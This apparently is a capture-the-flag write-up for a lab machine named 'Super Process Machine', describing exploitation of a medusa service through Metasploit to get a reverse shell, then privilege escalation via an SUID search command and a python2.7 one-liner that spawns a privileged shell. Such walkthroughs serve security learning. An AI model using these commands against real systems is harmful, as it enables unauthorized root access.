# Super Process Machine

Start with scan IP of machine

![image.png](https://3641998078-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv4bbPCMP2UOAXGuYloqD%2Fuploads%2Fh58c9XaelJ2qiVD8Hzh4%2Fimage.png?alt=media)

after search for `medusa` service we found CVE <https://www.exploit-db.com/exploits/42779> which we can use Metasploit to exploit this service

<figure><img src="https://3641998078-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv4bbPCMP2UOAXGuYloqD%2Fuploads%2FTV0Fc0gdFBJhScP7AYfZ%2Fimage%201.png?alt=media" alt=""><figcaption></figcaption></figure>

we success to take a reverse shell on this machine

now let’s make a privilege escalation which we started to search on process have SUID

```bash
find / -perm -u=s -type f 2>/dev/null
```

<figure><img src="https://3641998078-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv4bbPCMP2UOAXGuYloqD%2Fuploads%2FzlE17orxTKXEnPeTeVz8%2Fimage%202.png?alt=media" alt=""><figcaption></figcaption></figure>

now let’s search on python 2.7 exploit

<figure><img src="https://3641998078-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv4bbPCMP2UOAXGuYloqD%2Fuploads%2FnQUYlFJYIiJtb8qxB104%2Fimage%203.png?alt=media" alt=""><figcaption></figcaption></figure>

```bash
/usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
```

<figure><img src="https://3641998078-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fv4bbPCMP2UOAXGuYloqD%2Fuploads%2Fg4PJTLjfq1Yw0LyqLota%2Fimage%204.png?alt=media" alt=""><figcaption></figcaption></figure>